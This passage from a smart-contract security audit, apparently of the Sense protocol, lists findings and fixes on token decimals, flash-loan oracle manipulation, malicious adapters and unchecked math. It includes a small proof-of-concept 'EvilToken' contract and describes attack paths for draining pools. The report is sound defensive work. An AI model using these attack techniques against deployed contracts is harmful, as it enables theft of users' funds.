Situation: Numerous parts of the logic above perform repeated calls to the decimals() function of Target.sol and Underlying.sol. At times, these are used in various calculations. An attacker is able to mutate the value returned by decimals() multiple times intra-transaction if they so wished, when it comes to a permissionless or untrusted ERC-20, target or underlying. This could lead to exploits, because the return value of decimals() is used for calculating balance transfers and other important logic. Here is a proof of concept example of an EvilToken contract cast with Rari's ERC-20 abstract, returning different decimals() results based on the timestamp:

import { ERC20 } from "contracts/ERC20.sol"; // Rari ERC20

contract EvilToken {
    function decimals() view public returns (uint8) {
        return uint8(block.timestamp % 18);
    }
}

contract Victim {
    function getTokensDecimals(address token) view public returns (uint8) {
        return ERC20(token).decimals();
    }
}

Recommendation: Any external calls should pass some logical preconditions. The result of those external calls should be stored in internal contracts and be re-used when the result is expected to be constant, as is the case with decimals(). In this case, the external call to decimals() or other external "constants" should be consolidated in one call backed by preconditions. When these preconditions are met, the call should accept it, cache the value in its respective adapter, and have future dependent reads of this constant come from that location rather than from an external call to decimals(). After they pass logical preconditions, the adapter should save any constants pertaining to Target and Underlying tokens, rather than doing an external call each time. The danger with external calls is that they could return a different result, bypass initial logical preconditions, and mutate the result to achieve an exploit.
Sense: We've decided to cache some values from adapters here & here, but for others (like target decimals), we've decided to leave them out under the assumption that a malicious actor can cause problems in many ways, and we can't make strong guarantees about them without reviewing the code. The onus will be on us to clearly communicate which adapters have been audited and are seen as safe.
Spearbit: It is indeed important to show which adapters are audited.

+3.1.7 LP Oracle Should Enforce 18 Decimals Or Use Decimal Flexible Fixed Point Math
Severity: High Risk
Context: LP.sol#L87-L88

uint256 value = PriceOracle(msg.sender).price(tokenA).fmul(balanceA, FixedPointMathLib.WAD) +
    PriceOracle(msg.sender).price(tokenB).fmul(balanceB, FixedPointMathLib.WAD);

Situation: This calculation assumes all priced tokens have 18 decimals. This can be implicitly enforced with Zero tokens, which can be deployed at 18 decimals every time. However, target tokens exist that are not 18 decimals, such as USDC (6 decimals), and any user-created ERC-20 could set decimals anywhere within uint8 bounds. If a target token with fewer than 18 decimals is passed, the calculation would undervalue the LP tokens. If the target token has more than 18 decimals, it could overvalue them. Both of these could lead to attacks. According to the documentation, the creation of Zeros and Fuse pools is intended to become permissionless. This means that users could build malicious pools that purposely undervalue or overvalue to steal the tokens of other users that join them.
Recommendation: Enforce and support only tokens with 18 decimals, which is likely the safest option considering the complexity; this contract should check the decimals variable of both tokens passed. Alternatively, consider making the calculation more flexible by utilizing the token's decimals as the base units for the fixed point math, rather than the constant WAD:

uint256 value = PriceOracle(msg.sender).price(tokenA).fmul(balanceA, 10**tokens[0].decimals()) +
    PriceOracle(msg.sender).price(tokenB).fmul(balanceB, 10**tokens[1].decimals());

With permissionless tokens, there is still a risk of abuse and exploitation with this flexibility; a malicious party could create an ERC-20 contract that reports a certain decimals() value under normal circumstances and a different one when they wish to conduct the attack. By checking tx.origin, msg.sender, or another global variable they may have control over, they may trigger an attack. With the current set of contracts, there isn't a safe, flexible method, but another issue ("untrusted ERC-20 decimals") offers a fix for this. That issue suggests that decimals() pass some preconditions and then be stored in the adapter. Pulling decimals() from the adapter instead should be safer:

uint256 value = PriceOracle(msg.sender).price(tokenA).fmul(balanceA, adapter.cachedDecimals(tokenA)) +
    PriceOracle(msg.sender).price(tokenB).fmul(balanceB, adapter.cachedDecimals(tokenB));

This assumes an implementation where the adapter pulls, then checks and caches, the decimals() for tokens pertaining to it.
Sense: Addressed in #165.
Spearbit: I would consider it provisionally fixed, because that specific fix potentially expands the "untrusted ERC-20 decimals" vulnerability, at least in the case of untrusted ERC-20s, potentially added when permissionless.
Sense: Noted! However, there are no plans at this time to allow permissionless adapters to use the fuse pool (the consumer of the oracle).
Spearbit: Sounds good in this regard then; the tokens should not be untrusted and are expected to be audited + verified on Etherscan or have reproducible bytecode confirmed.
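The cache-on-registration pattern that both of these findings point to could look roughly like the sketch below. cachedDecimals, registered and the 18-decimals precondition are illustrative assumptions, not Sense's actual implementation:

pragma solidity ^0.8.0;

interface IERC20Metadata {
    function decimals() external view returns (uint8);
}

// Sketch: read decimals() once, validate it, cache it, and serve all later
// reads from storage so a malicious token cannot mutate the value mid-protocol.
contract DecimalsCacheSketch {
    mapping(address => uint8) public cachedDecimals;
    mapping(address => bool) public registered;

    function _register(address token) internal {
        require(!registered[token], "already registered");
        uint8 dec = IERC20Metadata(token).decimals();
        require(dec > 0 && dec <= 18, "unsupported decimals"); // precondition
        cachedDecimals[token] = dec;
        registered[token] = true;
    }

    function baseUnit(address token) public view returns (uint256) {
        require(registered[token], "unknown token");
        return 10 ** uint256(cachedDecimals[token]);
    }
}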
+3.1.8 Intra-Transaction Oracle Tampering Possible With LP Pricing Using Flashloans
Severity: High Risk
Context: LP.sol#L87-L88

uint256 value = PriceOracle(msg.sender).price(tokenA).fmul(balanceA, FixedPointMathLib.WAD) +
    PriceOracle(msg.sender).price(tokenB).fmul(balanceB, FixedPointMathLib.WAD);

Situation: This utilizes the current balances of the respective tokens within the LP. As these are current balances, they are trivial to manipulate via a flash loan. By setting arbitrary pool values that are only true at a certain point of the transaction, an attacker could potentially tamper with the price. An attacker could also exploit this to create a skewed price for one of the tokens in the Fuse pool and then drain the contract of the rest. Recent similar attacks have been done in the wild on Fuse, resulting from weak oracles, even ones with TWAP. The associated Zero price should have a TWAP backing it according to the current commit hash, when it is completed and working. However, if the oracle is enabled on a pool without sufficiently safe liquidity, it may still be vulnerable to flash loan attacks, even with the TWAP. The target price, which will be the other token used in the calculation, may also be manipulable. This price also does not appear to be TWAP-based in the 2 current adapter implementations, and is therefore even more trivial to manipulate, even with sufficient liquidity. This is true except in the case that constant pricing is used, i.e. for CETH. Compound-based adapters will likely use their built-in Oracle pricing; prior implementations have been exploited in the past, even with stablecoins such as DAI, leading to millions in losses.
Recommendation: Avoid using variables that are current and that the transaction originator (tx.origin) could temporarily change during the course of the transaction. This is most commonly done now by using time-weighted calculations of the variables at hand. Utilizing these makes it much harder to pull off a profitable intra-transaction attack, and will likely require the attack to be spread over multiple blocks. The more blocks, the likelier any skewing by the prospective attacker is arbitraged/MEV'd out. This increases the risk of loss to a potential attacker, discouraging such an attack; intra-transaction attacks, by contrast, are practically risk-free. One part of the Balancer pools is the ability to enable them as an oracle. These should only be enabled once they attain a minimal liquidity threshold that is sustained over a period of time. Even when using TWAP, a low-liquidity pool could still yield profitable attacks within a relatively short number of blocks of the tampering transaction. It is also important to consider multiple sources of truth; if available (and ideally on-chain), require them to be within some acceptable margin of error to each other. If they are outside of this margin, they should fail. The sources should always come from a source above a liquidity threshold, as one low-liquidity source could be used to grief others.
Sense: We are exploring viable solutions to this with the Balancer team. Our work is in the direction of this suggestion: "Additionally consider multiple sources of truth if available, ideally on-chain, and require them to be within some acceptable margin of error to each other, but fail if they are outside of this margin." Namely, there are certain properties of Zeros that will let us bound a reasonable price (a Zero cannot go above 1 underlying, and the price will not be too dislocated from other Zeros of similar Series).

+3.1.9 Avoid External Calls To Transient Or Unverified External Contracts
Severity: High Risk
Context: PoolManager.sol#L190

uint256 err = ComptrollerLike(comptroller)._deployMarket(false, constructorData, targetParams.collateralFactor);

PoolManager.sol#L254

uint256 errZero = ComptrollerLike(comptroller)._deployMarket(

PoolManager.sol#L274

uint256 errLpToken = ComptrollerLike(comptroller)._deployMarket(

Situation: External calls take place via the _deployMarket function through the set Comptroller. Rari Capital's on-chain Ethereum mainnet Comptroller calls out to a contract called FuseAdminProxy. This contract's implementation can be transient, and its underlying implementation source code is missing as well as unverified on Etherscan. It handles the deployment and potential control of Fuse pool derived tokens. Interacting with transient, unverified contracts on-chain can be quite dangerous, as their underlying logic could turn malicious at some point. Due to the difficulty in verifying states or effects, interacting with unverified/missing contracts could lead to malicious contract interactions. Below are the listed on-chain contracts as reference points, with links to their respective Etherscan pages:
• FuseAdmin proxy contracts (AdminUpgradabilityProxy.sol) on Etherscan
• Unverified implementation used by proxy on Etherscan
• Unitroller is directly called here, which is an upgradeable proxy contract on Etherscan
Currently, the above point to the following Comptroller implementation on Etherscan.
Recommendation: Make sure any dependencies of the code logic lead to verified contracts only. With regards to transient or proxy and/or upgradeable contracts, keep in mind that there is a high degree of trust put into whatever personnel are managing said proxy. Be absolutely sure to trust the proxy personnel not to eventually deploy a breaking and/or malicious contract. If the Sense team must, then ideally the team will consider only interacting with proxy patterns that allow the dependent users to opt in to logic or implementation changes.
Sense: Noted; the Rari Capital team has been informed of the unverified contract and will see to it being verified.
+3.1.10 Check zeroParams and lpTokenParams Is Not Empty
Severity: High Risk
Context: PoolManager.sol#L158-197
Situation: The function addTarget() checks that targetParams is not empty. However, addSeries() does not check that zeroParams and lpTokenParams are not empty. As these parameters are set via setParams(), they might not be set yet. Combine this with the fact that anyone can call addSeries(), and there is a possibility of a griefing attack.

function addTarget(address target, address adapter) external requiresTrust returns (address cTarget) {
    ...
    require(targetParams.irModel != address(0), Errors.TargetParamNotSet);
    ...
    bytes memory constructorData = abi.encode( ... targetParams.irModel, ... );
    uint256 err = ComptrollerLike(comptroller)._deployMarket(false, constructorData, targetParams.collateralFactor);
    ...
}

function addSeries(address adapter, uint48 maturity) external {
    ...
    // no checks on zeroParams
    bytes memory constructorDataZero = abi.encodePacked( ... zeroParams.irModel, ... );
    uint256 errZero = ComptrollerLike(comptroller)._deployMarket(false, constructorDataZero, zeroParams.collateralFactor);
    ...
    // no checks on lpTokenParams
    bytes memory constructorDataLpToken = abi.encodePacked( ... lpTokenParams.irModel, ... );
    uint256 errLpToken = ComptrollerLike(comptroller)._deployMarket(false, constructorDataLpToken, lpTokenParams.collateralFactor);
    ...
}

Recommendation: Verify that zeroParams and lpTokenParams are not empty within the function addSeries().
Sense: Addressed in #156.
Spearbit: Acknowledged.
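A sketch of the recommended guard, mirroring the existing targetParams require in addTarget(); the struct shape and error strings are assumptions for illustration, with irModel doubling as the "is set" sentinel:

pragma solidity ^0.8.0;

// Sketch: fail addSeries() early when admin-set params have not been set yet.
contract AddSeriesGuardSketch {
    struct AssetParams { address irModel; uint256 reserveFactor; uint256 collateralFactor; }

    AssetParams public zeroParams;
    AssetParams public lpTokenParams;

    function addSeries(address adapter, uint48 maturity) external view {
        require(zeroParams.irModel != address(0), "zeroParams not set");
        require(lpTokenParams.irModel != address(0), "lpTokenParams not set");
        // ... deploy the Zero and LP token markets only once both param sets are set ...
        adapter; maturity; // silence unused-variable warnings in this sketch
    }
}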
+3.1.11 Use safeMath for Space contract
Severity: High Risk
Context:
• Space.sol#L132, Space.sol#L133, Space.sol#L182, Space.sol#L213,
• Space.sol#L214, Space.sol#L263, Space.sol#L264, Space.sol#L291,
• Space.sol#L300, Space.sol#L356, Space.sol#L366, Space.sol#L369,
• Space.sol#L373, Space.sol#L379, Space.sol#L401, Space.sol#L418,
• Space.sol#L423, Space.sol#L435, Space.sol#L439, Space.sol#L443,
• Space.sol#L447, Space.sol#L456, Space.sol#L493, Space.sol#L498,
• Space.sol#L503, Space.sol#L509, Space.sol#L510, Space.sol#L516,
• Space.sol#L523, Space.sol#L524.
Situation: onJoinPool() is high risk, as it could mint a large amount of tokens, and so are other locations in Space.sol. The Space contract builds on Balancer contracts and thus uses Solidity 0.7.x. However, math operations in Solidity 0.7.x can underflow and overflow, and the Space contract doesn't have sufficient protection against this.
Recommendation: Use safeMath functions for all additions, subtractions, multiplications and divisions, for example from the OpenZeppelin SafeMath.sol or Balancer Math.sol libraries for Solidity 0.7.x.
Sense: Addressed in #3. Note in this PR that everywhere safeMath is not used, an explicit reason is given.
Spearbit: Acknowledged.
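For illustration, the sketch below shows the difference between unchecked 0.7.x math and OpenZeppelin's SafeMath (the Balancer Math.sol library works analogously):

pragma solidity ^0.7.0;

import "@openzeppelin/contracts/math/SafeMath.sol";

contract CheckedMathSketch {
    using SafeMath for uint256;

    // Unchecked 0.7.x math: silently wraps, e.g. unsafeSub(0, 1) == type(uint256).max.
    function unsafeSub(uint256 a, uint256 b) external pure returns (uint256) {
        return a - b;
    }

    // Checked math: reverts on underflow instead of wrapping.
    function safeSub(uint256 a, uint256 b) external pure returns (uint256) {
        return a.sub(b);
    }
}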
3.2 Medium Risk Issues

+3.2.1 Attempted Out Of Bound Array Access On TWAP Result When Zero Address >= Target Address
Severity: Medium Risk
Context: Zero.sol#L87-98

BalancerOracleLike.OracleAverageQuery[] memory queries = new BalancerOracleLike.OracleAverageQuery[](1);
queries[0] = BalancerOracleLike.OracleAverageQuery({
    variable: BalancerOracleLike.Variable.PAIR_PRICE,
    secs: TWAP_PERIOD,
    ago: 0
});

uint256[] memory results = pool.getTimeWeightedAverage(queries);

// get the price of Zeros in terms of underlying
(uint8 zeroi, ) = pool.getIndices();
uint256 zeroPrice = results[zeroi];

Situation: zeroi can be either 0 or 1, depending on the zero address being smaller or equal/larger than its corresponding target address. In the latter case, an out of bounds array access is attempted on the results variable, which only holds 1 result, matching the requested number of queries. This out of bounds access leads to a panic code-path and will revert the transaction. This means any Zero address that has a larger bytes20 representation than its target would be DoS'd from accessing the Zero oracle; thereby, a number of functionalities for it would never be able to work. In the case of non-deterministic addresses being used, the chance of this occurring is equivalent to a coin toss, i.e. 50/50. If it had been deployed in the wild, this may not initially be noticed. Due to the probabilistic nature of this problem, it may go unnoticed even with some initial successful deployments of Zero contracts. However, once discovered, it would require a pause and a redeploy with a fix.
References: Balancer v2 test snippet confirming the behaviour of getTimeWeightedAverage returning 1 result per query: PoolPriceOracle.test.ts#L521-L540.
Recommendation: With array access or modification, always ensure it is kept within bounds (and that its bounds are known). The addition of unit tests and fuzzed tests attempting different scenarios could help avoid this. In this case, the contract should only access the result at index 0, and mathematically handle the pricing as needed, if its reciprocal is required.
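A sketch of the recommended handling is below: always read the single result at index 0 and, if needed, take the reciprocal. The BalancerOracleLike interface is mirrored from the snippet above, TWAP_PERIOD is an assumed value, and whether the reciprocal is actually required depends on how the pool quotes the pair price:

pragma solidity ^0.8.0;

interface BalancerOracleLike {
    enum Variable { PAIR_PRICE, BPT_PRICE, INVARIANT }
    struct OracleAverageQuery { Variable variable; uint256 secs; uint256 ago; }
    function getTimeWeightedAverage(OracleAverageQuery[] memory queries) external view returns (uint256[] memory);
    function getIndices() external view returns (uint8 zeroi, uint8 targeti);
}

contract ZeroPriceSketch {
    uint256 public constant TWAP_PERIOD = 1 hours; // assumed value

    function zeroPrice(BalancerOracleLike pool) external view returns (uint256) {
        BalancerOracleLike.OracleAverageQuery[] memory queries = new BalancerOracleLike.OracleAverageQuery[](1);
        queries[0] = BalancerOracleLike.OracleAverageQuery({
            variable: BalancerOracleLike.Variable.PAIR_PRICE,
            secs: TWAP_PERIOD,
            ago: 0
        });
        // One query in, one result out: index 0 is the only valid index.
        uint256 pairPrice = pool.getTimeWeightedAverage(queries)[0];

        (uint8 zeroi, ) = pool.getIndices();
        // If the Zero is the second token of the pair, the quote is the other
        // way around, so take the reciprocal of the 18-decimal price.
        return zeroi == 0 ? pairPrice : (1e18 * 1e18) / pairPrice;
    }
}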
+3.2.2 Force Claim Collection For Any Address
Severity: Medium Risk
Context: Divider.sol#L331-398, Claim.sol#L37-44
Situation: In this scenario, assume an actor does a transferFrom transaction on the Claim token contract with a specific from and an amount of 0 tokens. This transaction will succeed in the ERC20 contract, as allowance == 0 and amount <= allowance; collect() in Divider.sol will then be called with uBalTransfer == 0. The _collect() function will be called where uBal and uBalTransfer are set to uBal (which is the balance of the from). This scenario triggers the claim collection for the from. The from might not want to do the claim collection at that point in time. The claim itself will go to the from, so nothing is lost there, but the control over timing could be an issue.

contract Claim is Token {
    ...
    function transferFrom(...) public override returns (bool) {
        Divider(divider).collect(from, adapter, maturity, value, to);
        // No revert on super.transferFrom(from, to, 0)
        return super.transferFrom(from, to, value);
    }
}

contract Divider is Trust, ReentrancyGuard, Pausable {
    ...
    function collect(
        address usr,
        address adapter,
        uint256 maturity,
        uint256 uBalTransfer, // uBalTransfer == 0
        address to
    ) external nonReentrant onlyClaim(adapter, maturity) whenNotPaused returns (uint256 collected) {
        uint256 uBal = Claim(msg.sender).balanceOf(usr);
        // _collect is called with uBal as the second to last parameter
        return _collect(usr, adapter, maturity, uBal, uBalTransfer > 0 ? uBalTransfer : uBal, to);
    }
}

This construction is probably created to support the calling of collect() in contract Claim.sol:

function collect() external returns (uint256 _collected) {
    return Divider(divider).collect(msg.sender, adapter, maturity, 0, address(0));
}

Recommendation: Differentiate between these two calls from the Claim.sol contract, transferFrom() and collect(), and do not trigger a collect() from an empty transferFrom().
Sense: Fixed in #168.
Spearbit: Acknowledged.
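A minimal sketch of the recommended differentiation: only trigger the collection for non-zero transfer amounts. This is illustrative and not necessarily how #168 implements it:

pragma solidity ^0.8.0;

interface DividerLike {
    function collect(address usr, address adapter, uint256 maturity, uint256 uBalTransfer, address to)
        external returns (uint256);
}

// Sketch of a Claim-like token: collection is only forced for non-zero
// transfers, so a 0-amount transferFrom can no longer time someone's collect.
abstract contract ClaimSketch {
    DividerLike public divider;
    address public adapter;
    uint256 public maturity;

    function _transferFrom(address from, address to, uint256 value) internal virtual returns (bool);

    function transferFrom(address from, address to, uint256 value) public returns (bool) {
        if (value > 0) {
            divider.collect(from, adapter, maturity, value, to);
        }
        return _transferFrom(from, to, value);
    }
}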
+3.2.3 Disabled Adapters Should Stay Disabled
Severity: Medium Risk
Context: Divider.sol#L107-109

function addAdapter(address adapter) external whenPermissionless whenNotPaused {
    _setAdapter(adapter, true);
}

Situation: Anyone can enable an adapter again as soon as someone has disabled the adapter (in whenPermissionless). This circumvents the reason to disable the adapter.
Recommendation: Don't allow an adapter that has been removed (i.e. it was active and it is being disabled) to be re-added. As discussed, this is the preferred solution of the Sense team.
Sense: Fixed here.
Spearbit: Acknowledged.
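One possible shape of this fix is sketched below: a one-way latch that records that an adapter was disabled, so the permissionless addAdapter() path cannot re-enable it. The names are illustrative, not the actual Sense fix:

pragma solidity ^0.8.0;

contract AdapterRegistrySketch {
    mapping(address => bool) public enabled;
    mapping(address => bool) public wasDisabled;

    // Permissionless path: can only enable adapters never disabled by an admin.
    function addAdapter(address adapter) external {
        require(!wasDisabled[adapter], "adapter permanently disabled");
        enabled[adapter] = true;
    }

    function disableAdapter(address adapter) external /* requiresTrust */ {
        enabled[adapter] = false;
        wasDisabled[adapter] = true; // latch: intentionally never cleared
    }
}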
Initial deployment is acceptable by an EOA, however, before it gets deployed live, all access controls should be solely with secure multisigs from that point forward. Sense: We’ve decided to stick with Trust and use a multisig. +3.2.9 Move The safeApprove() Stake to BaseAdapter.sol and Update the Inheritance in Periphery.sol Severity: Medium Risk Context: BaseAdapter.sol, CropAdapter.sol, WstETHAdapter.sol, CAdapter.sol, Periphery.sol Situation: The inheritance of the BaseAdapter.sol isn’t quite right, which re- sults in a few issues: 25 Periphery.sol imports Adapter from CropAdapter.sol, while WstETHAdapter.sol inherits directly from BaseAdapter.sol. The safeApprove() of stake in the constructor for CropAdapter isn’t called for WstETHAdapter.sol. This means that the Divider cannot transfer the stake, which it tries to do in settleSeries() and backfillScale(). Recommendation: Move the safeApprove() of stake to BaseAdapter.sol (as- suming the stake is relevant for all adapters). In Periphery.sol, change the inheritance from CropAdapter.sol to BaseAdapter.sol. Sense: We’ve changed here the Periphery to import BaseAdapter and not CropAdapter. Also, we have removed the safeApprove() there which fixes the mentioned issue. Do you still think that it’s better to merge CropAdapter into BaseAdapter? The idea was to keep them separate as not all the adapters need the crop function- ality (this is the case of the CAdapter for example). Spearbit: If it’s useful to keep CropAdapter separate that is also fine. However, the linked change does not seem to remove the safeApprove() call from the CropAdapter constructor as stated. +3.2.10 Checks In issue() And redeemZero() Severity: Medium Risk Context: Divider.sol#L183-231, Divider.sol#L279-313 Situation: The functions issue() in Divider.sol#L183-231 and redeemZero() of Divider.sol have extra checks when the flags level.issueRestricted() or level.redeemZeroRestricted() are set. In that case, the function can only be executed when called from an adapter. The contract Periphery, specifically Periphery.sol#L410, Periphery.sol#L514, Periphery.sol#L557, calls these functions as well. However, these calls would not be allowed. The extra checks are potentially too strict. 26 function issue(...) external nonReentrant whenNotPaused returns (uint256 uBal) ,! { ... if (level.issueRestricted()) { require(msg.sender == adapter, Errors.IssuanceRestricted); } ... } function redeemZero(...) external nonReentrant whenNotPaused returns (uint256 ,! tBal) { ... if (level.redeemZeroRestricted()) { require(msg.sender == adapter, Errors.RedeemZeroRestricted); } } Recommendation: Double check if calling from Periphery should also be al- lowed. Sense: After seeing this issue, we’ve decided that if redeemZeroRestricted() in Divider.sol#L289-291 is set, then when _removeLiquidity() in Periphery.sol- #L551-578 is called at or after maturity we will not be redeeming zeros and will transfer the zeros back to the user. You can see this change on PR#160. Spearbit: Acknowledged. +3.2.11 Defining Bytes Literals With A String Literal Causes Malformed Bytes Severity: Medium Risk Context: PoolManager.sol#L185, PoolManager.sol#L249, PoolManager.sol#L269, Periphery.sol#L375, Periphery.sol#L465, Periphery.sol#L472 Situation: The bytes variable is set by a string literal. The variable’s data in this case will be equivalent to the ASCII encoded data of the string, not a hex literal version of it. 
This causes the variable to contain malformed bytes which the developer likely didn't expect. In the best case, it causes unnecessary extra gas cost. In the worst case, it could lead to undefined and unexpected effects during contract interaction, especially when said bytes are passed on to other contracts as calldata. E.g. PoolManager.sol#L185:

    bytes memory constructorData = abi.encode(
        target,
        comptroller,
        targetParams.irModel,
        ERC20(target).name(),
        ERC20(target).symbol(),
        cERC20Impl,
        "0x00", // calldata sent to becomeImplementation (currently unused)
        targetParams.reserveFactor,
        adminFee
    );

The developer would appear to expect the bytes 0x00 to be sent along as calldata, but in fact this would send 0x30783030 as the calldata, the ASCII-encoded bytes equivalent of the string "0x00". The prospective contract this would call out to, for now, appears to essentially ignore these bytes. However, future implementations could end up depending on them, which would lead to adverse effects and issues. One of the on-chain contracts within this call-chain that may use this calldata is an unverified contract, which could lead to issues, but this cannot be confirmed due to the lack of source code availability. If this ought to be 0x00, define it using a hex literal as hex'00'. Periphery.sol#L465:

    userData: ""

This is an exception to the other mentioned context lines, since it is just an empty string literal and will not cause malformed bytes. However, it would still be best practice to define it with a hex literal. The malformed-bytes issue is why hex literals should be preferred over even hex-escaped strings for bytes. Recommendation: Use hex literals whenever declaring or setting a bytes type, via hex'01234dead5678beef', for most clarity that it is bytes. If Sense prefers to utilize strings, appropriate hex escapes in the form of "\x01\x23" also work. Sense: Addressed in #156.

+3.2.12 Beware Of Malicious Adapters Severity: Medium Risk Context: Periphery.sol Situation: The following functions allow interaction with any adapter. These adapters could be malicious. No additional checks are made on the validity of the adapter. Through the adapter, a re-entrant call could be made, and no nonReentrant modifier is used in the Periphery contract.

    function sponsorSeries(address adapter, ... )
    function swapTargetForZeros(address adapter, ... )
    function swapUnderlyingForZeros(address adapter, ... )
    function swapTargetForClaims(address adapter, ... )
    function swapUnderlyingForClaims(address adapter, ... )
    function swapZerosForTarget(address adapter, ... )
    function swapZerosForUnderlying(address adapter, ... )
    function swapClaimsForTarget(address adapter, ... )
    function swapClaimsForUnderlying(address adapter, ... )
    function addLiquidityFromTarget(address adapter, ... )
    function addLiquidityFromUnderlying(address adapter, ... )
    function removeLiquidityToTarget(address adapter, ... )
    function removeLiquidityToUnderlying(address adapter, ... )
    function migrateLiquidity(address srcAdapter, address dstAdapter, ...)

Within Periphery.sol, there are several locations where a safeApprove() is given to an adapter. Frequently, the token for which the safeApprove() is given is also derived from the adapter, and can therefore also be manipulated. These are the relevant lines:

    ERC20(target).safeApprove(address(adapterClone), type(uint256).max);
    ERC20(Adapter(adapter).underlying()).safeApprove(adapter, uBal); // approve adapter to pull uBal
    ERC20(Adapter(adapter).underlying()).safeApprove(adapter, uBal); // approve adapter to pull underlying
    ERC20(Adapter(adapter).target()).safeApprove(adapter, tBal); // approve adapter to pull target
    underlying.safeApprove(adapter, uBal);
    ERC20(Adapter(adapter).target()).safeApprove(adapter, tBal);
    if (_allowance < amount) target.safeApprove(address(adapter), type(uint256).max);
A malicious adapter could therefore steal any tokens present in the Periphery contract. This holds both now and in the future, as the approval will persist. Recommendation: Consider using a whitelist for the adapters. Add a nonReentrant modifier to the functions that use the adapter. Make sure no tokens will be stored in the Periphery contract (now and in the future). Sense: No tokens should be present in the Periphery contract, so this reduces the potential impact. Sense: Regarding "Make sure no tokens will be stored in the Periphery contract (now and in the future)": yes, this is a great call and we're currently going through to verify this. On the note of malicious adapters, our thinking is that we will need to be very clear about which adapters have been verified/audited, because we can make no guarantees about unknown ones. Spearbit: Agreed.

+3.2.13 Admin Can Always Update lscales Levels Severity: Medium Risk Context: Divider.sol#511-547, Divider.sol#L466-468 Situation: An administrator of the protocol can arbitrarily set the lscales levels of users at any moment. This directly impacts the amount that can be collected in the collect() function. The update of lscales levels can be done by setting the adapter to off, which will allow the require in backfillScale() to pass. Following this, a call to backfillScale() can set arbitrary values in lscales. Finally, the adapter can be set back to on. Although this is protected by requiresTrust, it is probably best to limit this possibility.

    function setAdapter(address adapter, bool isOn) public requiresTrust {
        _setAdapter(adapter, isOn);
    }

    function backfillScale(..., address[] calldata _usrs, uint256[] calldata _lscales) external requiresTrust {
        ...
        // continues when adapters[adapter] == false
        require(!adapters[adapter] || block.timestamp > cutoff, ...);
        /* Set user's last scale values for the Series (needed for the `collect` method) */
        for (uint256 i = 0; i < _usrs.length; i++) {
            lscales[adapter][maturity][_usrs[i]] = _lscales[i];
        }
        ...
    }

Recommendation: Double check the circumstances under which an administrator can perform such updates. Sense: We've decided to keep this ability for admins for edge cases. Instead of removing it, it'll be clearly mentioned in the docs and we'll run discussions to ensure that the community has sight into our thought processes. That said, we are internally still discussing this.

3.3 Low Risk Issues

+3.3.1 Trust.sol No Longer Present In solmate Library Severity: Low Risk Context: • Divider.sol#L7, CropAdapter.sol#L5, EmergencyStop.sol#L5, LP.sol#L6, • Periphery.sol#L6, PoolManager.sol#L6, SpaceFactory.sol#L8, • Token.sol#L6, Underlying.sol#L5, Zero.sol#L6, Target.sol#L5. Situation: The contract Trust.sol is no longer present in the latest version of the Rari-Capital solmate library. This means no (security) updates/fixes will be made to the Trust.sol contract. Recommendation: Fork the latest version of Trust.sol or move to another authorization library. Sense: We've decided to bump solmate to v6 and maintain Trust.sol ourselves inside our utils package. Fixed here.
+3.3.2 Change References to SafeERC20.sol to SafeTransferLib.sol Severity: Low Risk Context: • Divider.sol#L6, GClaimManager.sol#L5, Periphery.sol#L5, • BaseAdapter.sol#L5, CAdapter.sol#L6, CropAdapter.sol#L6, • LP.sol#L5, Pool.sol#L4, Vault.sol#L4, Zero.sol#L5, • BaseFactory.sol#L6, WstETHAdapter.sol#L9. Situation: The functions from SafeERC20.sol have moved to SafeTransferLib.sol, which means the code needs changes to be able to compile with the latest version of the solmate library. Recommendation: Change the references from SafeERC20 to SafeTransferLib. Sense: Fixed here.

+3.3.3 Entry Checks in exit() and excess() Severity: Low Risk Context: GClaimManager.sol Situation: The functions exit() and excess() in GClaimManager don't check that join() has been completed. The function excess() doesn't check that the claim exists. Although the functions will either revert or perform non-harmful updates, it is better to check and give a relevant error message. Also for consideration: excess() stores data, so the comment "VIEWS" is misleading.

    function exit(address adapter, uint48 maturity, uint256 uBal) external {
        (, address claim, , , , , , , ) = Divider(divider).series(adapter, maturity);
        require(claim != address(0), Errors.SeriesDoesntExists);
        ...
        uint256 total = totals[claim] + collected; // Doesn't check join() has been done
        ...
        gclaims[claim].burn(msg.sender, uBal); // will revert if join() hasn't been done
    }

    function excess(address adapter, uint48 maturity, uint256 uBal) public returns (uint256 tBal) {
        (, address claim, , , , , , , ) = Divider(divider).series(adapter, maturity); // Doesn't check claim != address(0)
        uint256 initScale = inits[claim]; // Doesn't check initScale != 0, e.g. join() has been done
    }

Recommendation: Do appropriate entry checks in the functions exit() and excess(). Remove the "VIEWS" comment. Note: GClaimManager will most likely be deprecated. This issue is included for completeness.

+3.3.4 Require SeriesStatus to be NONE Before Calling queueSeries Severity: Low Risk Context: PoolManager.sol#L210

    require(sStatus[adapter][maturity] != SeriesStatus.QUEUED, Errors.DuplicateSeries);

Situation: Currently, this line checks that the SeriesStatus is not QUEUED. This means that, after a series is added, a trusted user could re-queue it, allowing others to potentially re-call addSeries. This appears possible from the submitted contract, and from the verified contracts it would call out to, it also seems possible; however, there is at least one unverified contract in the call-chain. This could enable a griefing attack on this contract and on Fuse. Recommendation: Explicitly check that the SeriesStatus to be queued is NONE.
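A sketch of the stricter check (whether Errors.DuplicateSeries remains the appropriate error value here is a judgment call for the team):

    require(sStatus[adapter][maturity] == SeriesStatus.NONE, Errors.DuplicateSeries);

With this form, a series that has ever been queued or added can never be queued again.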
+3.3.5 block.timestamp Can Be Manipulated By Miners Severity: Low Risk Context: • Periphery.sol, GClaimManager.sol, Space.sol#L160, Space.sol#L401, • Space.sol#L435, Divider.sol#L30, Divider.sol#L33, Divider.sol#L142, • Divider.sol#L368, Divider.sol#L522, Divider.sol#L564, Divider.sol#L566, • Divider.sol#L572. Situation: At the protocol level, timestamps are a variable submitted by miners. The protocol only guarantees their monotonicity. Therefore, they are non-trivially manipulable by miners for purposes of MEV. It is a risk for critical logic of the contract to be dependent on such a variable. However, such manipulation would widely affect the Ethereum ecosystem, so there is a low chance miners would take such a risk. This serves as a notice of the possibility of miners manipulating the timestamp for the purposes of MEV. Recommendation: The past general recommendation regarding block.timestamp has been to consider block.number as a better gauge of time. However, with the upcoming merge and forks, block.number may become unreliable for this in the mid- to long-term. For a contract that aims to operate consistently following the merge, block.timestamp may right now be the less risky option compared to block.number with regard to references for elapsed time. The rule of thumb regarding this usage is to make sure it is only used for references to longer time frames, i.e. nothing under 1 hour.

+3.3.6 Dependence On symbol() Value Severity: Low Risk Context: CAdapter.sol#L176-178 Situation: The evaluation of _isCETH depends on the symbol() of a token. With permissionless use of the protocol, this might not be reliable. Recommendation: Consider checking for (whitelisted) addresses instead of the token's symbol().

